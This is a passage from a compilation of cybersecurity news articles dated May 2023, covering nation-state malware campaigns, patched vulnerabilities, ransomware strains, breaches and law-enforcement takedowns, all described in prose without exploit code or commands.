The self-destruct instructions, engineered after decrypting and decoding the malware's network communications, caused the "Snake implant to disable itself without affecting the host computer or legitimate applications on the computer," the agency said.
Snake, according to an advisory released by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), is designed as a covert tool for long-term intelligence collection on high-priority targets, enabling the adversary to create a peer-to-peer (P2P) network of compromised systems across the world.
What's more, several systems in the P2P network served as relay nodes to route disguised operational traffic to and from Snake malware implanted on FSB's ultimate targets, making the activity challenging to detect.
The C-based cross-platform malware further employs custom communication methods to add a new layer of stealth and features a modular architecture that allows for an efficient way to inject or modify components to augment its capabilities and retain persistent access to valuable information.
"Snake demonstrates careful software engineering design and implementation, with the implant containing surprisingly few bugs given its complexity," CISA said, adding initial versions of the implant were developed around early 2004.
"The name Uroburos is appropriate, as the FSB cycled it through nearly constant stages of upgrade and redevelopment."
Infrastructure associated with the Kremlin-backed group has been identified in over 50 countries across North America, South America, Europe, Africa, Asia, and Australia, although its targeting is assessed to be more tactical, encompassing government networks, research facilities, and journalists.
Victimized sectors within the U.S. include education, small businesses, and media organizations, as well as critical infrastructure sectors such as government facilities, financial services, critical manufacturing, and communications.
Despite these setbacks, Turla remains an active and formidable adversary, unleashing an array of tactics and tools to breach its targets across Windows, macOS, Linux, and Android.
The development comes a little over a year after U.S. law enforcement and intelligence agencies disarmed a modular botnet known as Cyclops Blink controlled by another Russian nation-state actor referred to as Sandworm.
Microsoft's May Patch Tuesday Fixes 38 Flaws, Including Active Zero-Day Bug
10.5.23 Vulnerebility The Hacker News
Microsoft has rolled out Patch Tuesday updates for May 2023 to address 38 security flaws, including one zero-day bug that it said is being actively exploited in the wild.
Trend Micro's Zero Day Initiative (ZDI) said the volume is the lowest since August 2021, although it pointed out that "this number is expected to rise in the coming months."
Of the 38 vulnerabilities, six are rated Critical and 32 are rated Important in severity. Eight of the flaws have been tagged with "Exploitation More Likely" assessment by Microsoft.
This is aside from 18 flaws including 11 bugs since the start of May the Windows maker resolved in its Chromium-based Edge browser following the release of April Patch Tuesday updates.
Topping the list is CVE-2023-29336 (CVSS score: 7.8), a privilege escalation flaw in Win32k that has come under active exploitation. It's not immediately clear how widespread the attacks are.
"An attacker who successfully exploited this vulnerability could gain SYSTEM privileges," Microsoft said, crediting Avast researchers Jan Vojtμek, Milαnek, and Luigino Camastra for reporting the flaw.
The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the flaw to its Known Exploited Vulnerabilities (KEV) catalog, urging organizations to apply vendor fixes by May 30, 2023.
Also of note are two publicly known flaws, one of which is a critical remote code execution flaw impacting Windows OLE (CVE-2023-29325, CVSS score: 8.1) that could be weaponized by an actor by sending a specially crafted email to the victim.
Microsoft, as mitigations, is recommending that users read email messages in plain text format to protect against this vulnerability.
The second publicly known vulnerability is CVE-2023-24932 (CVSS score: 6.7), a Secure Boot security feature bypass that's weaponized by the BlackLotus UEFI bootkit to exploit CVE-2022-21894 (aka Baton Drop), which was resolved in January 2022.
"This vulnerability allows an attacker to execute self-signed code at the Unified Extensible Firmware Interface (UEFI) level while Secure Boot is enabled," Microsoft said in a separate guidance.
"This is used by threat actors primarily as a persistence and defense evasion mechanism. Successful exploitation relies on the attacker having physical access or local admin privileges on the targeted device."
It's worth noting that the fix shipped by Microsoft is disabled by default and requires customers to manually apply the revocations, but not before updating all bootable media.
"Once the mitigation for this issue is enabled on a device, meaning the revocations have been applied, it cannot be reverted if you continue to use Secure Boot on that device," Microsoft cautioned. "Even reformatting of the disk will not remove the revocations if they have already been applied."
The tech giant said it's taking a phased approach to completely plug the attack vector to avoid unintended disruption risks, an exercise that's expected to stretch until the first quarter of 2024.
"Modern UEFI-based Secure Boot schemes are extremely complicated to configure correctly and/or to reduce their attack surfaces meaningfully," firmware security firm Binarly noted earlier this March. "That being said, bootloader attacks are not likely to disappear anytime soon."
U.S. Authorities Seize 13 Domains Offering Criminal DDoS-for-Hire Services
10.5.23 Crime The Hacker News
U.S. authorities have announced the seizure of 13 internet domains that offered DDoS-for-hire services to other criminal actors.
The takedown is part of an ongoing international initiative dubbed Operation PowerOFF that's aimed at dismantling criminal DDoS-for-hire infrastructures worldwide.
The development comes almost five months after a "sweep" in December 2022 dismantled 48 similar services for abetting paying users to launch distributed denial-of-service (DDoS) attacks against targets of interest.
This includes school districts, universities, financial institutions, and government websites, according to the U.S. Department of Justice (DoJ).
Ten of the 13 illicit domains seized are "reincarnations" of booter or stresser services that were previously shuttered towards the end of last year.
"In recent years, booter services have continued to proliferate, as they offer a low barrier to entry for users looking to engage in cybercriminal activity," DoJ said in a press release on Monday.
"In addition to harming victims by disrupting or degrading access to the internet, attacks from booter services can also completely sever internet connections for other customers served by the same internet service provider via a shared connection point."
Parallel to the domain seizures, the DoJ also said that four of the six individuals who were charged in December 2022 in connection with operating the services have entered into a guilty plea.
The defendants Jeremiah Sam Evans Miller, 23, of San Antonio, Texas; Angel Manuel Colon Jr., 37, of Belleview, Florida; Shamar Shattock, 19, of Margate, Florida; and Cory Anthony Palmer, 23, of Lauderhill, Florida are expected to be sentenced later this year.
Try2Check Card-Checking Service Goes Down#
The announcement comes days after the disruption of Try2Check (aka Try2Services) following a decade-long investigation, an illegal online platform that enabled threat actors to check the status of stolen credit card numbers in their possession and determine if they were valid and active.
The DoJ also charged a 43-year-old Russian national, Denis Gennadievich Kulkov, for his role in creating and turning the service into a "primary tool of the illicit credit card trade," with the State Department offering a $10 million reward for information leading to his arrest.
The department is further extending a separate bounty of up to $1 million for any specifics that will help to identify other key leaders of the Try2Check cybercrime group.
The fraudulent platform, per the indictment, allegedly misused the systems of a prominent U.S.-based payment processing firm to perform the card checks by exploiting its preauthorization service. The name of the company was not disclosed.
Try2Check, which launched in 2005, is estimated to have processed tens of millions of credit card checks every year and facilitated the operations of several major card shops like Joker's Stash that specialized in bulk trafficking of stolen credit cards. As of February 2022, a single card check cost $0.20.
"Through the illegal operation of his websites, the defendant made at least $18 million in bitcoin (as well as an unknown amount through other payment systems), which he used to purchase a Ferrari, among other luxury items," the DoJ noted.
The indictment against Kulkov also arrives weeks after Denis Mihaqlovic Dubnikov, who pleaded guilty to charges of money laundering for the Ryuk ransomware gang earlier this year, was sentenced to time served and ordered to forfeit $2,000 in illegal profits.
Operation ChattyGoblin: Hackers Targeting Gambling Firms via Chat Apps
10.5.23 Hacking The Hacker News
A gambling company in the Philippines was the target of a China-aligned threat actor as part of a campaign that has been ongoing since October 2021.
Slovak cybersecurity firm ESET is tracking the series of attacks against Southeast Asian gambling companies under the name Operation ChattyGoblin.
"These attacks use a specific tactic: targeting the victim companies' support agents via chat applications in particular, the Comm100 and LiveHelp100 apps," ESET said in a report shared with The Hacker News.
The use of a trojanized Comm100 installer to deliver malware was first documented by CrowdStrike in October 2022. The company attributed the supply chain compromise to a threat actor likely with associations to China.
The attack chains leverage the aforementioned chat apps to distribute a C# dropper that, in turn, deploys another C# executable, which ultimately serves as a conduit to drop a Cobalt Strike beacon on hacked workstations.
Also highlighted in ESET's APT Activity Report Q4 2022Q1 2023 are attacks mounted by India-linked threat actors Donot Team and SideWinder against government institutions in South Asia.
Another set of limited attacks has been tied to another Indian APT group called Confucius that's been active since at least 2013 and is believed to share ties with the Patchwork group. The threat actor has in the past used Pegasus-themed lures and other decoy documents to target Pakistan government agencies.
The latest intrusion, per ESET, involved the use of a remote access trojan dubbed Ragnatela that's an upgraded variant of the BADNEWS RAT.
Elsewhere, the cybersecurity company said it detected the Iranian threat actor referred to as OilRig (aka Hazel Sandstorm) deploying a custom implant labeled Mango to an Israeli healthcare company.
It's worth noting that Microsoft recently attributed Storm-0133, an emerging threat cluster affiliated to Iran's Ministry of Intelligence and Security (MOIS), to attacks exclusively targeting Israeli local government agencies and companies serving the defense, lodging, and healthcare sectors.
"The MOIS group used the legitimate yet compromised Israeli website for command-and-control (C2), demonstrating an improvement in operational security, as the technique complicates defenders' efforts, which often leverage geolocation data to identify anomalous network activity," Microsoft noted, further pointing out Storm-0133's reliance on the Mango malware in these intrusions.
ESET also said an unnamed Indian data management services provider was at the receiving end of an attack mounted by the North Korea-backed Lazarus Group in January 2023 using an Accenture-themed social engineering lure.
"The goal of the attackers was to monetize their presence in the company's network, most likely through business email compromise," the company said, calling it a shift from its traditional victimology patterns.
The Lazarus Group, in February 2023, is also said to have breached a defense contractor in Poland via fake job offers to initiate an attack chain that weaponizes a modified version of SumatraPDF to deploy a RAT called ScoringMathTea and a sophisticated downloaded codenamed ImprudentCook.
Rounding off the list is a spear-phishing activity from Russia-aligned APT groups such as Gamaredon, Sandworm, Sednit, The Dukes, and SaintBear, the last of which has been detected employing an updated version of its Elephant malware framework and a novel Go-based backdoor known as ElephantLauncher.
Other notable APT activity spotted during the time period comprises that of Winter Vivern and YoroTrooper, which ESET said strongly overlaps with a group that it has been tracking under the name SturgeonPhisher since the start of 2022.
Evidence gathered so far points to YoroTrooper being active since at least 2021, with attacks singling out government, energy, and international organizations across Central Asia and Europe.
Public disclosure of its tactics in March 2023 is suspected to have led to a "big drop in activity," raising the possibility that the group is currently retooling its arsenal and altering its modus operandi.
ESET's findings follow Kaspersky's own APT trends report for Q1 2023, which unearthed a previously unknown threat actor christened Trila targeting Lebanese government entities using "homebrewed malware that enables them to remotely execute Windows system commands on infected machines."
The Russian cybersecurity company also called attention to the discovery of a new Lua-based malware strain referred to as DreamLand targeting a government entity in Pakistan, marking one of the rare instances where an APT actor has used the programming language in active attacks.
"The malware is modular and utilizes the Lua scripting language in conjunction with its Just-in-Time (JIT) compiler to execute malicious code that is difficult to detect," Kaspersky researchers said.
"It also features various anti-debugging capabilities and employs Windows APIs through Lua FFI, which utilizes C language bindings to carry out its activities."
Researchers Uncover SideWinder's Latest Server-Based Polymorphism Technique
10.5.23 APT The Hacker News
The advanced persistent threat (APT) actor known as SideWinder has been accused of deploying a backdoor in attacks directed against Pakistan government organizations as part of a campaign that commenced in late November 2022.
"In this campaign, the SideWinder advanced persistent threat (APT) group used a server-based polymorphism technique to deliver the next stage payload," the BlackBerry Research and Intelligence Team said in a technical report published Monday.
Another campaign discovered by the Canadian cybersecurity company in early March 2023 shows that Turkey has also landed in the crosshairs of the threat actor's collection priorities.
SideWinder has been on the radar since at least 2012 and it's primarily known to target various Southeast Asian entities located across Pakistan, Afghanistan, Bhutan, China, Myanmar, Nepal, and Sri Lanka.
Suspected to be an Indian state-sponsored group, SideWinder is also tracked under the monikers APT-C-17, APT-Q-39, Hardcore Nationalist (HN2), Rattlesnake, Razor Tiger, and T-APT4.
Typical attack sequences mounted by the actor entail using carefully crafted email lures and DLL side-loading techniques to fly under the radar and deploy malware capable of granting the actors remote access to the targeted systems.
Over the past year, SideWinder has been linked to a cyber attack aimed at Pakistan Navy War College (PNWC) as well as an Android malware campaign that leveraged rogue phone cleaner and VPN apps uploaded to the Google Play Store to harvest sensitive information.
The latest infection chain documented by BlackBerry mirrors findings from Chinese cybersecurity firm QiAnXin in December 2022 detailing the use of PNWC lure documents to drop a lightweight .NET-based backdoor (App.dll) that's capable of retrieving and executing next-stage malware from a remote server.
What makes the campaign also stand out is the threat actor's use of server-based polymorphism as a way to potentially sidestep traditional signature-based antivirus (AV) detection and distribute additional payloads by responding with two different versions of an intermediate RTF file.
Specifically, the PNWC document employs a method known as remote template injection to fetch the RTF file such that it harbors the malicious code only if the request originates from a user in the Pakistan IP address range.
"It is important to note that in both instances, only the name of the file 'file.rtf' and the file type are the same; however, the contents, file size and the file hash are different," BlackBerry explained.
"If the user is not in the Pakistani IP range, the server returns an 8-byte RTF file (file.rtf) that contains a single string: {\rtf1 }. However, if the user is within the Pakistani IP range, the server then returns the RTF payload, which varies between 406 KB 414 KB in size."
The disclosure arrives shortly after Fortinet and Team Cymru revealed a new set of attacks perpetrated by a Pakistan-based threat actor known as SideCopy against Indian defense and military targets.
"The latest SideWinder campaign targeting Turkey overlaps with the most recent developments in geopolitics; specifically, in Turkey's support of Pakistan and the ensuing reaction from India," BlackBerry said.
Microsoft Warns of State-Sponsored Attacks Exploiting Critical PaperCut Vulnerability
10.5.23 Exploit The Hacker News
Iranian nation-state groups have now joined financially motivated actors in actively exploiting a critical flaw in PaperCut print management software, Microsoft disclosed over the weekend.
The tech giant's threat intelligence team said it observed both Mango Sandstorm (Mercury) and Mint Sandstorm (Phosphorus) weaponizing CVE-2023-27350 in their operations to achieve initial access.
"This activity shows Mint Sandstorm's continued ability to rapidly incorporate [proof-of-concept] exploits into their operations," Microsoft said in a series of tweets.
On the other hand, CVE-2023-27350 exploitation activity associated with Mango Sandstorm is said to be on the lower end of the spectrum, with the state-sponsored group "using tools from prior intrusions to connect to their C2 infrastructure."
It's worth noting that Mango Sandstorm is linked to Iran's Ministry of Intelligence and Security (MOIS) and Mint Sandstorm is associated with the Islamic Revolutionary Guard Corps (IRGC).
The ongoing assault comes weeks after Microsoft confirmed the involvement of Lace Tempest, a cybercrime gang that overlaps with other hacking groups like FIN11, TA505, and Evil Corp, in abusing the flaw to deliver Cl0p and LockBit ransomware.
CVE-2023-27350 (CVSS score: 9.8) relates to a critical flaw in PaperCut MF and NG installations that could be exploited by an unauthenticated attacker to execute arbitrary code with SYSTEM privileges.
A patch was made available by PaperCut on March 8, 2023. Trend Micro's Zero Day Initiative (ZDI), which discovered and reported the issue, is expected to release more technical information about it on May 10, 2023.
What's more, cybersecurity firm VulnCheck, last week, published details on a new line of attack that can circumvent existing detections, enabling adversaries to leverage the flaw unimpeded.
With more attackers jumping in on the PaperCut exploitation bandwagon to breach vulnerable servers, it's imperative that organizations move quickly to apply the necessary updates (versions 20.1.7, 21.2.11, and 22.0.9 and later).
The development also follows a report from Microsoft which revealed that Iranian threat actors are increasingly relying on a new tactic that combines offensive cyber operations with multi-pronged influence operations to "fuel geopolitical change in alignment with the regime's objectives."
The shift coincides with an increased tempo in adopting newly reported vulnerabilities, the use of compromised websites for command-and-control to better conceal the source of attacks, and harnessing custom tooling and tradecraft for maximum impact.
New Ransomware Strain 'CACTUS' Exploits VPN Flaws to Infiltrate Networks
10.5.23 Ransomware The Hacker News
Cybersecurity researchers have shed light on a new ransomware strain called CACTUS that has been found to leverage known flaws in VPN appliances to obtain initial access to targeted networks.
"Once inside the network, CACTUS actors attempt to enumerate local and network user accounts in addition to reachable endpoints before creating new user accounts and leveraging custom scripts to automate the deployment and detonation of the ransomware encryptor via scheduled tasks," Kroll said in a report shared with The Hacker News.
The ransomware has been observed targeting large commercial entities since March 2023, with attacks employing double extortion tactics to steal sensitive data prior to encryption. No data leak site has been identified to date.
Following a successful exploitation of vulnerable VPN devices, an SSH backdoor is set up to maintain persistent access and a series of PowerShell commands are executed to conduct network scanning and identify a list of machines for encryption.
CACTUS attacks also utilize Cobalt Strike and a tunneling tool referred to as Chisel for command-and-control, alongside remote monitoring and management (RMM) software like AnyDesk to push files to the infected hosts.
Also taken are steps to disable and uninstall security solutions as well as extract credentials from web browsers and the Local Security Authority Subsystem Service (LSASS) for escalating privileges.
Privilege escalation is succeeded by lateral movement, data exfiltration, and ransomware deployment, the last of which is achieved by means of a PowerShell script that has also been used by Black Basta.
A novel aspect of CACTUS is the use of a batch script to extract the ransomware binary with 7-Zip, followed by removing the .7z archive before executing the payload.
"CACTUS essentially encrypts itself, making it harder to detect and helping it evade antivirus and network monitoring tools," Laurie Iacono, associate managing director for cyber risk at Kroll, told The Hacker News.
"This new ransomware variant under the name CACTUS leverages a vulnerability in a popular VPN appliance, showing threat actors continue to target remote access services and unpatched vulnerabilities for initial access."
The development comes days after Trend Micro shed light on another type of ransomware known as Rapture that bears some similarities to other families such as Paradise.
"The whole infection chain spans three to five days at most," the company said, with the initial reconnaissance followed by the deployment of Cobalt Strike, which is then used to drop the .NET-based ransomware.
The intrusion is suspected to be facilitated through vulnerable public-facing websites and servers, making it imperative that companies take steps to keep systems up-to-date and enforce the principle of least privilege (PoLP).
"Although its operators use tools and resources that are readily available, they have managed to use them in a way that enhances Rapture's capabilities by making it stealthier and more difficult to analyze," Trend Micro said.
CACTUS and Rapture are the latest additions to a long list of new ransomware families that have come to light in recent weeks, including Gazprom, BlackBit, UNIZA, Akira, and a NoCry ransomware variant called Kadavro Vector.
MSI Data Breach: Private Code Signing Keys Leaked on the Dark Web
10.5.23 Cyber The Hacker News
The threat actors behind the ransomware attack on Taiwanese PC maker MSI last month have leaked the company's private code signing keys on their dark website.
"Confirmed, Intel OEM private key leaked, causing an impact on the entire ecosystem," Alex Matrosov, founder and CEO of firmware security firm Binarly, said in a tweet over the weekend.
"It appears that Intel Boot Guard may not be effective on certain devices based on the 11th Tiger Lake, 12th Adler Lake, and 13th Raptor Lake."
Present in the leaked data are firmware image signing keys associated with 57 PCs and private signing keys for Intel Boot Guard used on 116 MSI products. The Boot Guard keys from MSI are believed to impact several device vendors, including Intel, Lenovo and Supermicro.
Intel Boot Guard is a hardware-based security technology that's designed to protect computers against executing tampered UEFI firmware.
The development comes a month after MSI fell victim to a double extortion ransomware attack perpetrated by a new ransomware gang known as Money Message.
MSI, in a regulatory filing at the time, said, "the affected systems have gradually resumed normal operations, with no significant impact on financial business." It, however, urged users to obtain firmware/BIOS updates only from its official website and refrain from downloading files from other sources.
The leak of the Intel Boot Guard keys poses significant risks as it undermines a vital firmware integrity check and could allow threat actors to sign malicious updates and other payloads and deploy them on targeted systems without raising any red flags.
It also follows another advisory from MSI recommending users to be on the lookout for fraudulent emails targeting the online gaming community that claim to be from the company under the pretext of a potential collaboration.
This is not the first time UEFI firmware code has entered the public domain. In October 2022, Intel acknowledged the leak of Alder Lake BIOS source code by a third party, which also included the private signing key used for Boot Guard.
Supermicro Products Not Impacted#
Following the publication of the story, Supermicro told The Hacker News that it investigated the risks stemming the leak of Intel Boot Guard keys and that its products are not affected.
"Based on our current review and investigation, Supermicro products are not affected," a spokesperson for the San Jose-based company said.
"Intel is aware of these reports and actively investigating," the chipmaker told The Hacker News in a statement.
"There have been researcher claims that private signing keys are included in the data including MSI OEM Signing Keys for Intel Boot Guard. It should be noted that Intel Boot Guard OEM keys are generated by the system manufacturer, and these are not Intel signing keys."
SideCopy Using Action RAT and AllaKore RAT to infiltrate Indian Organizations
8.5.23 Virus The Hacker News
The suspected Pakistan-aligned threat actor known as SideCopy has been observed leveraging themes related to the Indian military research organization as part of an ongoing phishing campaign.
This involves using a ZIP archive lure pertaining to India's Defence Research and Development Organization (DRDO) to deliver a malicious payload capable of harvesting sensitive information, Fortinet FortiGuard Labs said in a new report.
The cyber espionage group, with activity dating back to at least 2019, targets entities that align with Pakistan government interests. It's believed to share overlaps with another Pakistani hacking crew called Transparent Tribe.
SideCopy's use of DRDO-related decoys for malware distribution was previously flagged by Cyble and Chinese cybersecurity firm QiAnXin in March 2023, and again by Team Cymru last month.
Interestingly, the same attack chains have been observed to load and execute Action RAT as well as an open source remote access trojan known as AllaKore RAT.
The latest infection sequence documented by Fortinet is no different, leading to the deployment of an unspecified strain of RAT that's capable of communicating with a remote server and launching additional payloads.
The development is an indication that SideCopy has continued to carry out spear-phishing email attacks that use Indian government and defense forces-related social engineering lures to drop a wide range of malware.
SideCopy Hackers
Source: Team Cymru
Further analysis of the Action RAT command-and-control (C2) infrastructure by Team Cymru has identified outbound connections from one of the C2 server IP addresses to another address 66.219.22[.]252, which is geolocated in Pakistan.
The cybersecurity company also said it observed "communications sourced from 17 distinct IPs assigned to Pakistani mobile providers and four Proton VPN nodes," noting inbound connections to the IP address from IP addresses assigned to Indian ISPs.
In all, as many as 18 distinct victims in India have been detected as connecting to C2 servers associated with Action RAT and 236 unique victims, again located in India, connecting to C2 servers associated with AllaKore RAT.
The latest findings lend credence to SideCopy's Pakistan links, not to mention underscore the fact that the campaign has been successful in targeting Indian users.
"The Action RAT infrastructure, connected to SideCopy, is managed by users accessing the Internet from Pakistan," Team Cymru said. "Victim activity predated the public reporting of this campaign, in some cases by several months."
CERT-UA Warns of SmokeLoader and RoarBAT Malware Attacks Against Ukraine
8.5.23 Virus The Hacker News
An ongoing phishing campaign with invoice-themed lures is being used to distribute the SmokeLoader malware in the form of a polyglot file, according to the Computer Emergency Response Team of Ukraine (CERT-UA).
The emails, per the agency, are sent using compromised accounts and come with a ZIP archive that, in reality, is a polyglot file containing a decoy document and a JavaScript file.
The JavaScript code is then used to launch an executable that paves for the execution of the SmokeLoader malware. SmokeLoader, first detected in 2011, is a loader whose main objective is to download or load a stealthier or more effective malware onto infected systems.
CERT-UA attributed the activity to a threat actor it calls UAC-0006 and characterized it as a financially motivated operation carried out with the goal of stealing credentials and making unauthorized fund transfers.
In a related advisory, Ukraine's cybersecurity authority also revealed details of destructive attacks orchestrated by a group known as UAC-0165 against public sector organizations.
The attack, which targeted an unnamed state organization, entailed the use of a new batch script-based wiper malware called RoarBAT that performs a recursive search for files with a specific list of extensions and irrevocably deletes them using the legitimate WinRAR utility.
This, in turn, was achieved by archiving the identified files using the "-df" command-line option and subsequently purging the created archives. The batch script was executed by means of a scheduled task.
Simultaneously, Linux systems were compromised using a bash script that leveraged the dd utility to overwrite files with zero bytes, effectively avoiding detection by security software.
"It was found that the operability of electronic computers (server equipment, automated user workplaces, data storage systems) was impaired as a result of the destructive impact carried out with the use of appropriate software," CERT-UA said.
"Access to the ICS target of the attack is allegedly obtained by connecting to a VPN using compromised authentication data. The successful implementation of the attack was facilitated by the lack of multi-factor authentication when making remote connections to VPN."
The agency further attributed UAC-0165 with moderate confidence to the notorious Sandworm group (aka FROZENBARENTS, Seashell Blizzard, or Voodoo Bear), which has a history of unleashing wiper attacks since the start of the Russo-Ukrainian war last year.
The link to Sandworm stems from significant overlaps with another destructive attack that hit the Ukrainian state news agency Ukrinform in January 2023, which was tied to the adversarial collective.
The alerts come a week after CERT-UA cautioned of phishing attacks carried out by the Russian state-sponsored group APT28 targeting government entities in the country with fake Window update notifications.
Western Digital Confirms Customer Data Stolen by Hackers in March Breach
8.5.23 Incindent The Hacker News
Digital storage giant Western Digital confirmed that an "unauthorized third party" gained access to its systems and stole personal information belonging to the company's online store customers.
"This information included customer names, billing and shipping addresses, email addresses and telephone numbers," the San Jose-based company said in a disclosure last week.
"In addition, the database contained, in encrypted format, hashed and salted passwords and partial credit card numbers. We will communicate directly with impacted customers."
The development comes a little over a month after Western Digital divulged a "network security incident" on March 26, 2023, prompting the company to take its cloud services offline.
A subsequent report from TechCrunch last month revealed that the threat actors behind the attack were allegedly in possession of "around 10 terabytes of data," and were negotiating with Western Digital for a ransom of a "minimum 8 figures" to avoid leaking the information.
While the identity of the extortionists was unknown at the time, ALPHV (aka BlackCat) ransomware actors have since taken credit for the theft, issuing an ultimatum on April 18, 2023, to make the payment or risk the release of "important documents" and "priceless artifacts."
The actors have also published various screenshots on their dark web portal, displaying what appears to be video calls, emails, and documents related to Western Digital's incident response efforts in an attempt to indicate continued access to the company's systems even after the hack came to light.
Western Digital said it's aware of the publication of "other alleged Western Digital information," that it's "investigating the validity of this data," and that it has "control over our digital certificate infrastructure."
It has also taken the step of taking its online store offline, which it said is expected to be restored the week of May 15, 2023. Access to My Cloud service was restored on April 13, 2023.
Dragon Breath APT Group Using Double-Clean-App Technique to Target Gambling Industry
7.5.23 APT The Hacker News
An advanced persistent threat (APT) actor known as Dragon Breath has been observed adding new layers of complexity to its attacks by adopting a novel DLL side-loading mechanism.
"The attack is based on a classic side-loading attack, consisting of a clean application, a malicious loader, and an encrypted payload, with various modifications made to these components over time," Sophos researcher Gabor Szappanos said.
"The latest campaigns add a twist in which a first-stage clean application 'side'-loads a second clean application and auto-executes it. The second clean application side-loads the malicious loader DLL. After that, the malicious loader DLL executes the final payload."
Operation Dragon Breath, also tracked under the names APT-Q-27 and Golden Eye, was first documented by QiAnXin in 2020, detailing a watering hole campaign designed to trick users into downloading a trojanized Windows installer for Telegram.
A subsequent campaign detailed by the Chinese cybersecurity company in May 2022 highlighted the continued use of Telegram installers as a lure to deploy additional payloads such as gh0st RAT.
Dragon Breath is also said to be part of a larger entity called Miuuti Group, with the adversary characterized as a "Chinese-speaking" entity targeting the online gaming and gambling industries, joining the likes of other Chinese activity clusters like Dragon Castling, Dragon Dance, and Earth Berberoka.
Double-Clean-App Technique
The double-dip DLL side-loading strategy, per Sophos, has been leveraged in attacks targeting users in the Philippines, Japan, Taiwan, Singapore, Hong Kong, and China. These attempted intrusions were ultimately unsuccessful.
The initial vector is a fake website hosting an installer for Telegram that, when opened, creates a desktop shortcut that's designed to load malicious components behind the scenes upon launch, while also displaying to the victim the Telegram app user interface.
What's more, the adversary is believed to have created multiple variations of the scheme in which tampered installers for other apps, such as LetsVPN and WhatsApp, are used to initiate the attack chain.
The next stage involves the use of a second clean application as an intermediate to avoid detection and load the final payload via a malicious DLL.
The payload functions as a backdoor capable of downloading and executing files, clearing event logs, extracting and setting clipboard content, running arbitrary commands, and stealing cryptocurrency from the MetaMask wallet extension for Google Chrome.
"DLL sideloading, first identified in Windows products in 2010 but prevalent across multiple platforms, continues to be an effective and appealing tactic for threat actors," Szappanos said.
"This double-clean-app technique employed by the Dragon Breath group, targeting a user sector (online gambling) that has traditionally been less scrutinized by security researchers, represents the continued vitality of this approach."
New Vulnerability in Popular WordPress Plugin Exposes Over 2 Million Sites to Cyberattacks
6.5.23 Vulnerebility The Hacker News
Users of Advanced Custom Fields plugin for WordPress are being urged to update version 6.1.6 following the discovery of a security flaw.
The issue, assigned the identifier CVE-2023-30777, relates to a case of reflected cross-site scripting (XSS) that could be abused to inject arbitrary executable scripts into otherwise benign websites.
The plugin, which is available both as a free and pro version, has over two million active installations. The issue was discovered and reported to the maintainers on May 2, 2023.
"This vulnerability allows any unauthenticated user from stealing sensitive information to, in this case, privilege escalation on the WordPress site by tricking a privileged user to visit the crafted URL path," Patchstack researcher Rafie Muhammad said.
Reflected XSS attacks usually occur when victims are tricked into clicking on a bogus link sent via email or another route, causing the malicious code to be sent to the vulnerable website, which reflects the attack back to the user's browser.
This element of social engineering means that reflected XSS does not have the same reach and scale as stored XSS attacks, prompting threat actors to distribute the malicious link to as many victims as possible.
"[A reflected XSS attack] is typically a result of incoming requests not being sufficiently sanitized, which allows for the manipulation of a web application's functions and the activation of malicious scripts," Imperva notes.
It's worth noting that CVE-2023-30777 can be activated on a default installation or configuration of Advanced Custom Fields, although it's only possible to do so from logged-in users who have access to the plugin.
The development comes as Craft CMS patched two medium-severity XSS flaws (CVE-2023-30177 and CVE-2023-31144) that could be exploited by a threat actor to serve malicious payloads.
It also follows the disclosure of another XSS flaw in the cPanel product (CVE-2023-29489, CVSS score: 6.1) that could be exploited without any authentication to run arbitrary JavaScript.
"An attacker can not only attack the management ports of cPanel but also the applications that are running on port 80 and 443," Assetnote's Shubham Shah said, adding it could enable an adversary to hijack a valid user's cPanel session.
"Once acting on behalf of an authenticated user of cPanel, it is usually trivial to upload a web shell and gain command execution."
New Android Malware 'FluHorse' Targeting East Asian Markets with Deceptive Tactics
6.5.23 Android The Hacker News
Various sectors in East Asian markets have been subjected to a new email phishing campaign that distributes a previously undocumented strain of Android malware called FluHorse that abuses the Flutter software development framework.
"The malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs," Check Point said in a technical report. "These malicious apps steal the victims' credentials and two-factor authentication (2FA) codes."
The malicious apps have been found to imitate popular apps like ETC and VPBank Neo, which are widely used in Taiwan and Vietnam. Evidence gathered so far shows that the activity has been active since at least May 2022.
The phishing scheme in itself is fairly straightforward, wherein victims are lured with emails that contain links to a bogus website that hosts malicious APK files. Also added to the website are checks that aim to screen victims and deliver the app only if their browser User-Agent string matches that of Android.
Once installed, the malware requests for SMS permissions and prompts the user to input their credentials and credit card information, all of which is subsequently exfiltrated to a remote server in the background while the victim is asked to wait for several minutes.
The threat actors also abuse their access to SMS messages to intercept all incoming 2FA codes and redirect them to the command-and-control server.
The Israeli cybersecurity firm said it further identified a dating app that redirected Chinese-speaking users to rogue landing pages that are designed to capture credit card information.
Several high-profile organizations are said to be among the recipients of these phishing emails, including employees of the government sector and large industrial companies, with new infrastructure and fraudulent applications showing up every month.
Interestingly, the malicious functionality is implemented with Flutter, an open source UI software development kit that can be used to develop cross-platform apps from a single codebase.
While threat actors are known to use a variety of tricks like evasion techniques, obfuscation, and long delays before execution to resist analysis and get around virtual environments, the use of Flutter marks a new level of sophistication.
"The malware developers did not put much effort into the programming, instead relying on Flutter as a developing platform," the researchers concluded.
"This approach allowed them to create dangerous and mostly undetected malicious applications. One of the benefits of using Flutter is that its hard-to-analyze nature renders many contemporary security solutions worthless."
Hackers Targeting Italian Corporate Banking Clients with New Web-Inject Toolkit DrIBAN
5.5.23 Virus The Hacker News
Italian corporate banking clients are the target of an ongoing financial fraud campaign that has been leveraging a new web-inject toolkit called drIBAN since at least 2019.
"The main goal of drIBAN fraud operations is to infect Windows workstations inside corporate environments trying to alter legitimate banking transfers performed by the victims by changing the beneficiary and transferring money to an illegitimate bank account," Cleafy researchers Federico Valentini and Alessandro Strino said.
The bank accounts, per the Italian cybersecurity firm, are either controlled by the threat actors themselves or their affiliates, who are then tasked with laundering the stolen funds.
The use of web injects is a time-tested tactic that makes it possible for malware to inject custom scripts on the client side by means of a man-in-the-browser (MitB) attack and intercept traffic to and from the server.
The fraudulent transactions are often realized by means of a technique called Automated Transfer System (ATS) that's capable of bypassing anti-fraud systems put in place by banks and initiating unauthorized wire transfers from a victim's own computer.
Over the years, the operators behind drIBAN have gotten more savvy at avoiding detection and developing effective social engineering strategies, in addition to establishing a foothold for long periods in corporate bank networks.
Cleafy said 2021 was the year when the classic "banking trojan" operation evolved into an advanced persistent threat. Furthermore, there are indications that the activity cluster overlaps with a 2018 campaign mounted by an actor tracked by Proofpoint as TA554 targeting users in Canada, Italy, and the U.K.
